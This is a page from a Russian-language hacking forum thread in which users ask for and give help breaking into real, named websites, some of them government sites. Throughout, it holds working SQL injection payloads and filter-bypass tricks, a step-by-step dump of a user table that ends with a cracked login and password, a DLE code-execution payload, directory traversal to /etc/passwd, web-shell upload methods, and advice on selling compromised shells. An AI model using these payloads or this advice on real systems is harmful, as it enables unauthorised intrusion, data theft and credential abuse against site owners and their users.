PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 [89] 90 91 92 93 94 95 96 97 98

ART-inc
21.01.2013, 23:11
Имеется доступ в site/mysql/scripts/setup.php. pma 2.11.11.3. Как получить доступ к бд ?

er9j6@
21.01.2013, 23:47
как тут раскрутить тогда?

_http://www.orehi.net.ua/component/option,com_fireboard/Itemid,43/func,view'/id,9/view,threaded/catid,3/

Evil_Genius
22.01.2013, 18:07
Собственно нужна помощь:

1) Имею скуль "MySQL error based"

2) Вот пример скули, при которой у меня выдает название Базы данных сайта


site.ru/catalog/type/0/1+and(select+1+from(select+count(*),concat((select +(select+concat(0x7e,0x27,database(),0x27,0x7e))+f rom+`information_schema`.tables+limit+0,1),floor(r and(0)*2))x+from+`information_schema`.tables+group +by+x)a)+and+1=1

3) Как мне использую данную скуль прочитать etc/passwd ?

4) Как залить шелл через скуль имея полный путь до сайта и file_priv=Y

Artrix
23.01.2013, 20:16
delete

Сбербанк
23.01.2013, 21:43
Не могу раскрутить одну SQL, её запрос:

SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0

SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна.

Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа /

Остаётся только крутить через union, вывод на экран, но как это сделать не получается.

Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть?

Сам URL спалить никак не смогу.

winstrool
23.01.2013, 22:49
Не могу раскрутить одну SQL, её запрос:
SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0
SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна.
Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа /
Остаётся только крутить через union, вывод на экран, но как это сделать не получается.
Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть?
Сам URL спалить никак не смогу.


SELECT req, id FROM table_name WHERE `link` = '1' and (SUBSTRING((SELECT version()),1,1))=5#' AND `count` > 0

Что мешает крутить блиндем?

cat1vo
24.01.2013, 05:31
Не могу раскрутить одну SQL, её запрос:
SELECT req, id FROM table_name WHERE `link` = '[SQL]' AND `count` > 0
SQL очевидно в REQUEST_URI, из этого следует, что все символы кодируются в urlencode и к тому же вырезается символ / - из за чего конструкция /**/ невозможна.
Версия мускула 5.0.95, из этого следует, что функции extractvalue и updatexml не работают для вывода информации в ошибку, способ с floor rand тоже не работает из за режущегося символа /
Остаётся только крутить через union, вывод на экран, но как это сделать не получается.
Пробовал: -1'union(select(1,2))-- не работает, может быть ещё какие варианты есть?
Сам URL спалить никак не смогу.


Попробуйте метод с name_const, очень часто выручает в случаях где надо выполнять запрос без пробелов в Error-Based!

justonline
26.01.2013, 01:48
юзер вводит, допустим, имя и сохрняет настройки, обновляет страничку - подгружается js скрипт, который формирует табличку с его именем через innerhtml. мы можем через xss в DOM объекте подгрузить произвольный скрипт? у меня не получилос( только косвенно... через инпутовский автофокус.

blesse
26.01.2013, 12:42
2 часа уже мучаюсь, не могу залиться на win сервак по пхп функциям ограничений нету,шелл удается запустить без загрузки( eval(file_get_contents('shell.txt')); ) но епта запросы пост если они длинные режутся и все, короткие без проблем.какие на винде если качалки типо wget,curl ?

nicols
26.01.2013, 12:53
Интересная скуля (помогите)

Имеется ссылка вида :

_http://site.com/news.php?page=0

Добавляю кавычку и появляется вот что

http://s001.radikal.ru/i193/1301/ce/e0c4c0a2a41dt.jpg (http://radikal.ru/F/s001.radikal.ru/i193/1301/ce/e0c4c0a2a41d.png.html)

ЧТО ЛИБО СДЕЛАТЬ МОЖНО?Помогите!

blesse
26.01.2013, 15:20
Имеется ссылка вида :
_http://site.com/news.php?page=0
Добавляю кавычку и появляется вот что
http://s001.radikal.ru/i193/1301/ce/e0c4c0a2a41dt.jpg (http://radikal.ru/F/s001.radikal.ru/i193/1301/ce/e0c4c0a2a41d.png.html)
ЧТО ЛИБО СДЕЛАТЬ МОЖНО?Помогите!


Можно крестик в правом верхнем углу браузера нажать,а далее пуск>выкулючить.

А по сабжу кури Это (https://antichat.live/threads/43966/)

Помойму там в лимит инекция и ниче ты там не раскрутишь.

nicols
26.01.2013, 15:59
Можно крестик в правом верхнем углу браузера нажать,а далее пуск>выкулючить.
А по сабжу кури
Это (https://antichat.live/threads/43966/)
Помойму там в лимит инекция и ниче ты там не раскрутишь.


Очень смешно.Я там уже курил и не смог ничего сделать!

Помогите , я могу кинуть ссылку в ЛС, если кто-то захочет помочь.

m00c0w
26.01.2013, 18:41
Очень смешно.Я там уже курил и не смог ничего сделать!
Помогите , я могу кинуть ссылку в ЛС, если кто-то захочет помочь.


помочь и сделать- не одно и тоже.

Sat-hacker
26.01.2013, 19:41
Есть большое количество шелов,подскажите как на них заработать?В основном форумы vbulletinбслить базу продать никому не нужно,что можна придумать?Спасибо.

Unknown
26.01.2013, 22:52
Есть большое количество шелов,подскажите как на них заработать?В основном форумы vbulletinбслить базу продать никому не нужно,что можна придумать?Спасибо.


Биржы ссылок, гонять трафик, просто продавать шеллы и т.д.

А вообще на ачате была статья про монетизацию шеллов, достаточно было бы воспользоваться поиском:

/thread220472.html (https://antichat.live/threads/220472/)

skier529
26.01.2013, 23:55
Приветствую.

Нашел сайт, в котором заполненные поля передаются php-скрипту. А он уже редиректит на обычный html-файл. Сайт совсем простетский, поэтому не думаю, что там есть какие-то проверки на инъекции.

Пример обращения к php-скрипту:

http://site.ru/pochta.php?login=ya@ya.ru&parol=1111111

Собственно вопрос: как лучше всего воспользоваться php-injection в данном случае? Нужно залить шелл...

Unknown
27.01.2013, 09:35
Приветствую.
Нашел сайт, в котором заполненные поля передаются php-скрипту. А он уже редиректит на обычный html-файл. Сайт совсем простетский, поэтому не думаю, что там есть какие-то проверки на инъекции.
Пример обращения к php-скрипту:
http://site.ru/pochta.php?login=ya@ya.ru&parol=1111111
Собственно вопрос: как лучше всего воспользоваться php-injection в данном случае? Нужно залить шелл...


Во-первых, по ващим словам, это SQL инъекция, а не PHP.

Во-вторых, пока вы не запостите ссылку, никто вам точного ответа не даст.

blesse
27.01.2013, 10:38
2 часа уже мучаюсь, не могу залиться на win сервак по пхп функциям ограничений нету,шелл удается запустить без загрузки( eval(file_get_contents('shell.txt')); ) но епта запросы пост если они длинные режутся и все, короткие без проблем.какие на винде если качалки типо wget,curl ?


UPD

allow_url_fopen on

post_max_size 8M

max_file_uploads 20

upload_max_filesize 10M

функцией пыха copy тоже не удается создается файл с размером нормальным ,но открываю ,а там пусто.

Раньше подобные сервани тоже попадились ,но там все решалось просто бэкдор=>wget .... ,а на винде такая трабла 1 раз.

skier529
27.01.2013, 12:54
Во-первых, по ващим словам, это SQL инъекция, а не PHP.


Запись идет в TXT-файл.


Во-вторых, пока вы не запостите ссылку, никто вам точного ответа не даст.


Пример вот: logins-vk.3dn.ru/video465423567-4583112.html

По клику на кнопку войти все данные из заполненной формы передаются сюда:

upmozgoff.ru/log.php

Сами параметры:email и pass

Unknown
27.01.2013, 12:57
Запись идет в TXT-файл.
Пример вот: logins-vk.3dn.ru/video465423567-4583112.html
По клику на кнопку войти все данные из заполненной формы передаются сюда:
upmozgoff.ru/log.php
Сами параметры:
email
и
pass


Это обычный фэйк, который пишет инфу с введенной формы. Ничего с этим, вы не сделаете

romasjanXXL
27.01.2013, 14:44
День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_product кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз

cat1vo
27.01.2013, 15:09
День добрый. прошу помощи со скулей _http://www.multitoys.com.ua/index.php?productID=1A%00xa7A%3f&ukey=discuss_product кучу всего перепроовал а ничего не выходит. нашел вот это http://www.multitoys.com.ua/php.php только так ничего и не смог сделать . помогите плз


Издеваетесь? Проще простого...Совсем народ оборзел.


http://www.multitoys.com.ua/index.php?productID=1 or 1 group by mid(version(),rand(0)|0) having avg(0)&ukey=discuss_product

\/IRUS
27.01.2013, 19:11
Есть скуля с правами ROOT

Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.

Что можно сделать чтобы порутать данный серв?

Artrix
27.01.2013, 19:15
Есть скуля с правами ROOT
Читает любой файл в системе, но INTO OUTFILE не дает из-за Error-Based техники.
Что можно сделать чтобы порутать данный серв?


Может для начала залить шелл? Ищи админку.

\/IRUS
27.01.2013, 19:16
Может для начала залить шелл? Ищи админку.


ищу просто уже вариантов нету

LelouchMe
27.01.2013, 19:36
Не пойму как правильно тут составить запрос... Хелп плс...

http://skyscript.ru/primer/skynews/?act=nov&news_id=1

\/IRUS
27.01.2013, 19:47
Не пойму как правильно тут составить запрос... Хелп плс...
http://skyscript.ru/primer/skynews/?act=nov&news_id=1


Place: GET

Parameter: news_id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: act=nov&news_id=1' AND 9405=9405 AND 'UguU'='UguU

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: act=nov&news_id=1' AND (SELECT 6046 FROM(SELECT COUNT(*),CONCAT(0x3

a776c743a,(SELECT (CASE WHEN (6046=6046) THEN 1 ELSE 0 END)),0x3a6d616a3a,FLOOR(

RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iazZ'='ia

zZ

Type: UNION query

Title: MySQL UNION query (NULL) - 6 columns

Payload: act=nov&news_id=-7664' UNION ALL SELECT NULL,CONCAT(0x3a776c743a,0x

51754e467746706b6e4d,0x3a6d616a3a),NULL,NULL,NULL, NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: act=nov&news_id=1' AND SLEEP(5) AND 'ORSc'='ORSc

вот так http://skyscript.ru:80/primer/skynews/?act=nov&news_id=-3603%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280 x3a776c743a%2CIFNULL%28CAST%28version%28%29%20AS%2 0CHAR%29%2C0x20%29%2C0x3a6d616a3a%29%2CNULL%2CNULL %2CNULL%2CNULL%23

пробелы ток убери

ukrpunk
27.01.2013, 19:48
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--

cat1vo
27.01.2013, 19:54
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--


%0afrom table_name

\/IRUS
27.01.2013, 19:58
Подскажите, как обойти защиту от инъекций спейсвеба? режет запрос при наличии +from+table_name--


попробуй /**/from/**/table_name--

BigBear
28.01.2013, 08:07
попробуй /**/from/**/table_name--


SpaceWeb и это режет.

Там только %0a вместо порбелов помогает.

M1ks
28.01.2013, 22:55
Добрый вечер.

Нашел уязвимость подобную этой

/showthread.php?t=10915

В общем проблема такая.

Просмотреть содержимое файлов я могу, просмотреть путь я смог, но не смог сделать, чтобы выводился список файлов в директории, может прав нет, может я чтото не так делаю? посоветуйте способы?

+toxa+
28.01.2013, 23:27
Добрый вечер.
Нашел уязвимость подобную этой
/showthread.php?t=10915
В общем проблема такая.
Просмотреть содержимое файлов я могу, просмотреть путь я смог, но не смог сделать, чтобы выводился список файлов в директории, может прав нет, может я чтото не так делаю? посоветуйте способы?


если бага такая же, то тебе нужно просто засунуть туда пхп код соответствующий (список файлов в папке (http://ua2.php.net/manual/ru/function.readdir.php) или залить свой кодес (http://ua2.php.net/manual/ru/function.file-put-contents.php) ). лично я не вижу в этой особой проблемы.

ysmat
29.01.2013, 15:01
можно ли обойти такой фильтр


if (strpos($_GET['f'], '..') === false)
{
$a = dirname(__FILE__);
echo file_get_contents( $a . $_GET['f']);
}


я так понимаю нужен такой символ между точками который не должен нарушать сработку

конструкции .X./ в nix системах

тогда он пройдет через фильтр

либо замена точек на что то другое еквивалентное им

M1ks
29.01.2013, 15:04
если бага такая же, то тебе нужно просто засунуть туда пхп код соответствующий (
список файлов в папке (http://ua2.php.net/manual/ru/function.readdir.php)
или
залить свой кодес (http://ua2.php.net/manual/ru/function.file-put-contents.php)
). лично я не вижу в этой особой проблемы.


Не получилось через opendir.

Пример как вставлял:

&cmd=opendir("../");&highlight='.eval($_GET[cmd]).'

ничего не выводит..

Unknown
29.01.2013, 15:23
можно ли обойти такой фильтр

if (strpos($_GET['f'], '..') === false)
{
$a = dirname(__FILE__);
echo file_get_contents( $a . $_GET['f']);
}

я так понимаю нужен такой символ между точками который не должен нарушать сработку
конструкции .X./ в nix системах
тогда он пройдет через фильтр
либо замена точек на что то другое еквивалентное им


https://rdot.org/forum/showpost.php?p=3323&postcount=16 - в помощь.

er9j6@
29.01.2013, 17:14
версию вывести возможно тут?

_http://vkontakte.dj/index.php?option=com_fireboard&Itemid=41&catid=9&id=3378&func=view'

ysmat
29.01.2013, 17:25
https://rdot.org/forum/showpost.php?p=3323&postcount=16
- в помощь.


я уже пробовал ети методы они не помогают

но в описании функции file_get_contents есть интересное

цитата с http://php.su/functions/?f=file_get_contents&choice=info


Замечание: Если вы открываете URI содержащий спецсимволы, такие как пробел, вам нужно закодировать URI при помощи urlencode().



из етого следует что функция file_get_contents в принципе должна понимать урл кодированую строку пути

но по факту что то не работает

ProFiLeR
29.01.2013, 20:21
Говорю по факту, что есть, на данный момент:

1) самописный движок

2) ссылка типа index.php?id=hats

3) MySQL запрос не генерируется

4) id используется в условии if'a ( if( $_GET['id'] == "hats" ) {…} )

теперь вопрос, можно ли скормить параметру id спецсимвол ' (одинарную ковычку) и завершить if со своим последующим кодом, поставя знак комментария после своего кода, чтобы последующий код не мешал

Например:

1) .../index.php?id=hats'] == 'hats' && function(){ мой_код; return true;} ) { //

2) тоесть, чтобы код изменился с

if( $_GET['id'] == 'hats' ) {

на

if( 'hats' == 'hats' && function(){ мой_код; return true;} ) { // == "hats" ) {

P.S. извините, что не тегую, т.к. пишу с мобильного

mironich
29.01.2013, 20:31
ProFiLeR, нет.

ProFiLeR
30.01.2013, 00:00
ProFiLeR
, нет.


Жаль, значит придется ждать, когда перелистывание страниц сделают и SQLinj попробовать.

Я думал, что мой способ сработает, так как PHP интерпретируемый язык, но оказалось, что нет (не сработает).

justonline
30.01.2013, 00:52
Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56

и дальше идет листинг больщого Select Запроса.

первый раз вообще вижу такую шляпу. крутится?

LelouchMe
30.01.2013, 03:37
ребят, уязвимость в поле поиска - при подставке кавычки выдаёт -

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1

как правильно составлять запрос...?

BigBear
30.01.2013, 04:07
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' GROUP BY kilop ORDER' at line 56
и дальше идет листинг больщого Select Запроса.
первый раз вообще вижу такую шляпу. крутится?


Нужен весь запрос, или хотя бы урл.


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `path` LIKE '%vds%' AND `ntitle` LIKE '%'%'' at line 1


Попробуй так

' and 1='1

' and 1='2

И сравни результаты.

LelouchMe
30.01.2013, 12:33
Попробуй так
' and 1='1
' and 1='2
И сравни результаты.


Ни то ни другое не работает... Вот урл -

http://lib.pntu.edu.ua/?module=vds*section-84

BigBear
30.01.2013, 13:18
Ни то ни другое не работает... Вот урл -
http://lib.pntu.edu.ua/?module=vds*section-84


'and(1)='1 TRUE

'and(2)='1 FALSE

Режутся пробелы. Можно юзать только беспробельные варианты.

Ещё чуток покручу - выложу тут запросы.

UPD.

'and(extractvalue(1,concat(0x3a,(select(@@version) ))))='

XPATH syntax error: ':5.1.49-3'

'and(extractvalue(1,concat(0x3a,(select(database() )))))='

XPATH syntax error: ':lib_bd'

LelouchMe
30.01.2013, 14:06
XPATH syntax error:


То есть дальше посимвольный перебор...?

плюсую...)+

BigBear
30.01.2013, 15:12
То есть дальше посимвольный перебор...?
плюсую...)+


Не надо посимвольного перебора.

Я ж тебе докрутил до Error-Based. Теперь только через ошибку.

Да тебе и этого выше крыши.

LelouchMe
30.01.2013, 15:32
Не надо посимвольного перебора.
Я ж тебе докрутил до Error-Based. Теперь только через ошибку.
Да тебе и этого выше крыши.


Да, я понял, спасибо, просто в "слепых" ещё слабо разбираюсь...

Короче по такой схеме крутить я так понял:

http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+limit+0,1)))--

http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+0,1)))--

http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+3,1)))--

http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,table_name,column_name)+from+ information_schema.columns+where+table_schema!='in formation_schema'+limit+4,1)))--

http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(s elect+concat_ws(0x3a,login,password)+from+users1+l imit+0,1)))--

или как тут


Слепая инъекция. Пробел, слэши и некоторые другие символы использовать нельзя из-за ограничений HTTP-протокола. Есть вывод через ошибку с помощью ExtractValue
Запрос
:

http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,version())))='1

Результат
:

5.1.53

Из-за того, что нет пробела, использовать limit нельзя. group_concat тоже не работает. Обходится через дополнительные условия, в данном случае колонка data_length в information_schema.tables
Запрос
:

http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(concat(tab le_schema,'.',table_name))from(information_schema. tables)where`table_name`like(0x257573657225)and(da ta_length>0)))))='1

Результат
:

customsnew.users

Для перебора колонок используется ordinal_position в information_schema.columns, в которой хранится порядковый номер колонки в таблице
Запрос
:

http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(column_nam e)from(information_schema.columns)where`table_name `='users'and(ordinal_position=1)))))='1

Меняя ordinal_position от 1 до 6, получаем имена всех колонок
Результат
:

ID,login,password,name,email,comment

В таблице users всего одна запись. Получаем имя
Запрос
:

http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(login)from (users)where(id=1)))))='1

Результат
:

olga

Так как вывод через ExtractValue ограничен 31 символом, хэш пароля получаем двумя запросами
Запрос 1
:

http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,(select(password)f rom(users)where(id=1)))))='1

Запрос 2
:

http://gtk.gov.by/ru/press-center/1'or(ExtractValue(1,concat(0x3a,mid((select(passwo rd)from(users)where(id=1)),32,1))))='1

Результат
:

79e4b4438aba2b6d8e1caf9568e73e12

Расшифровываем хэш по радужным таблицам.
Результат
:

olga:olga11

LelouchMe
30.01.2013, 22:45
Да, кстати, а кто подскажет что это такое...?)

Вроде как не слепая... С такой ещё не стыкался...

http://www.rada-poltava.gov.ua/news/1'00000000'/

Melfis
31.01.2013, 01:44
Да, кстати, а кто подскажет что это такое...?)
Вроде как не слепая... С такой ещё не стыкался...
http://www.rada-poltava.gov.ua/news/1'00000000'/


http://www.rada-poltava.gov.ua/news/-25398276'union select 1,2,concat_ws(0x3a, user(), version()),4-- /

Vip77
01.02.2013, 20:43
http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?

Unknown
01.02.2013, 21:55
Del msg

Unknown
01.02.2013, 21:57
http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?


заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)

zloy_fantom
01.02.2013, 23:19
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)


А что делать, если /proc/self/environ выглядит так:

NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULN ULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNUL NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNUL

Т.е., прочитать я его могу, но, кажется, что-то с ним не так

Vip77
02.02.2013, 03:32
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)


там пхп не установлен походу

Unknown
02.02.2013, 19:54
В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php

http://www.exploit-db.com/exploits/24444/

Смысл в том, что он под метасплоит.

Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:


catlist[0]=brainyfuck123')||eval("echo 123;");//

Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.

Подскажите, что делаю не так

UPD: Форум почему-то убирает кавычку перед строкой brainyfuck123'), знайте что она там есть

panfilov1991
03.02.2013, 00:26
http://www.golowar.ru/news.php?id=67&page='

пишет:


SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1


Проверил сайт, можно ли считать это уязвимостью?

Как дальше её раскрутить чтоб исправить!

XAMEHA
03.02.2013, 13:15
В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php
http://www.exploit-db.com/exploits/24444/
Смысл в том, что он под метасплоит.
Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:

catlist[0]=brainyfuck123')||eval("echo 123;");//

Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
Подскажите, что делаю не так
UPD:
Форум почему-то убирает кавычку перед строкой
brainyfuck123')
, знайте что она там есть


Это работает только в том случае, если в шаблонах есть тег catlist или not-catlist.

Unknown
03.02.2013, 15:05
del msg

panfilov1991
03.02.2013, 16:32
не подскажите как раскрутить?


http://www.golowar.ru/news.php?id=67&page='



SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1


перепробовал всё, результат одна и та же таблица

Ereee
03.02.2013, 21:08
не подскажите как раскрутить?

http://www.golowar.ru/news.php?id=67&page='

перепробовал всё, результат одна и та же таблица


Никак, intval().

panfilov1991
03.02.2013, 22:19
Никак, intval().


то есть в базу не как не пробиться?

BlackIce
03.02.2013, 22:47
Not Acceptable


___http://plainfieldsportsnews.com/news.php?id=2%29%29+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+

Vip77
04.02.2013, 00:33
Not Acceptable


http://plainfieldsportsnews.com/news.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

BlackIce
04.02.2013, 00:37
http://plainfieldsportsnews.com/news.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/


only error based ?

BigBear
04.02.2013, 06:24
only error based ?


Религия не позволяет использовать Error-Based ? Тот же вывод, в чём проблемы то ? Какая то особая ситуация ?

er9j6@
04.02.2013, 14:43
GET /news.php HTTP/1.1

Host: www.golowar.ru

X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

Стоит WP на сервере там, вывести пароль не могу, в чем проблема?

GET /news.php HTTP/1.1

Host: www.golowar.ru

X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

Table 'wp.wp_users' doesn't exist

Ereee
04.02.2013, 15:19
GET /news.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Стоит WP на сервере там, вывести пароль не могу, в чем проблема?
GET /news.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(version())from(wp.wp_users)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Table 'wp.wp_users' doesn't exist


Table 'wp.wp_users' doesn't exist

er9j6@
04.02.2013, 16:08
Table 'wp.wp_users' doesn't exist


Так-то она есть

GET /main.php HTTP/1.1

Host: www.golowar.ru

X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(concat_ws(0x3a,table_schema,table_name))from(inf ormation_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'

Duplicate entry 'wp:wp_users' for key 'group_key'

BigBear
04.02.2013, 17:40
Так-то она есть
GET /main.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(concat_ws(0x3a,table_schema,table_name))from(inf ormation_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Duplicate entry 'wp:wp_users' for key 'group_key'


Обрами название бд и таблицы апострофами

`wp`.`wp_users`

Unknown
05.02.2013, 16:31
Del, thx

BlackIce
07.02.2013, 19:25
Имеется возможность править html код страницы. Когда пишу оно просто выводится браузером как обычный тег, будто работаю не с пхп страницей. Что можно сделать?

Konqi
07.02.2013, 19:29
Имеется возможность править html код страницы. Когда пишу оно просто выводится браузером как обычный тег, будто работаю не с пхп страницей. Что можно сделать?


ничего

Vip77
09.02.2013, 18:32
Кое как залил wso через file_get_contents а там такое и ничего не открывает из меню... Не Sec. Info не Console... В чем дело?

http://clip2net.com/clip/m201037/1360416311-clip-17kb.png

er9j6@
09.02.2013, 18:34
Кое как залил wso через file_get_contents а там такое и ничего не открывает из меню... Не Sec. Info не Console... В чем дело?
http://clip2net.com/clip/m201037/1360416311-clip-17kb.png



Попробуй с99 залить, возможно он будет работать

Vip77
09.02.2013, 18:58
c99 вообще не заливается... дело в том, что я пытаюсь залить через

Через админку, через могу править только content так что вписал туда с начала и залил wso и ничего не получилось, попробовал вписать " />

и терь меню шелла доступно, но файлы не показывает, и в консолье команды не выполняются

er9j6@
09.02.2013, 19:02
c99 вообще не заливается... дело в том, что я пытаюсь залить через
Через админку, через могу править только content так что вписал туда с начала и залил wso и ничего не получилось, попробовал вписать " />
и терь меню шелла доступно, но файлы не показывает, и в консолье команды не выполняются


Так можешь вписать вверху index.php?

Click";} else {die("err");}}?>

'); ?>

foma9999
10.02.2013, 07:31
Как можно залиться, если доступа к табле юзеров нет?

http://www.elitdress.ru/catalog/product_info.php?products_id=-0+UNION+SELECT+1,2+--+

Известен путь: /var/www/masha/data/www/elitdress.ru/catalog/product_info.php

Известен юзер: masha_elitdress@localhost

Пробовал через char - не вышло.

В админку не попасть, хэши не брутятся.

Пытаюсь залиться через SQL.

Konqi
10.02.2013, 08:21
Как можно залиться, если доступа к табле юзеров нет?
http://www.elitdress.ru/catalog/product_info.php?products_id=-0+UNION+SELECT+1,2+--+
Известен путь: /var/www/masha/data/www/elitdress.ru/catalog/product_info.php
Известен юзер: masha_elitdress@localhost
Пробовал через char - не вышло.
В админку не попасть, хэши не брутятся.
Пытаюсь залиться через SQL.


сам же ответил на свой вопрос.

если file_priv нету или mq=on,

то через иньекцию залиться не получится.

Vip77
10.02.2013, 14:29
Не могу выполнить ни одну команду в консоле, пишет Unable to execute command

OC Linux Kernel 2.6.32

zloy_fantom
10.02.2013, 18:05
Нашел и хочу скачать образ системы на сайте (доступно через directory traversal), но acunetix выдает ошибку, не могу мол так много качать и сбрасывает соединение (как повысить лимит, не нашел), если скормить ссылку браузеру, он выдает ахинею (возможно, с потерей информации) и при сохранении ее в файл образ не собирается. У разных браузеров файл получается разного размера, так что этот путь неверен. Flash Get ругается на ссылку и не хочет качать, естественно, ведь она имеет вид site?id=etc/linux.img

Может кто знает, какой проге надо это безобразие скормить, чтобы нормально скачалось?

Спасибо

cat1vo
10.02.2013, 19:00
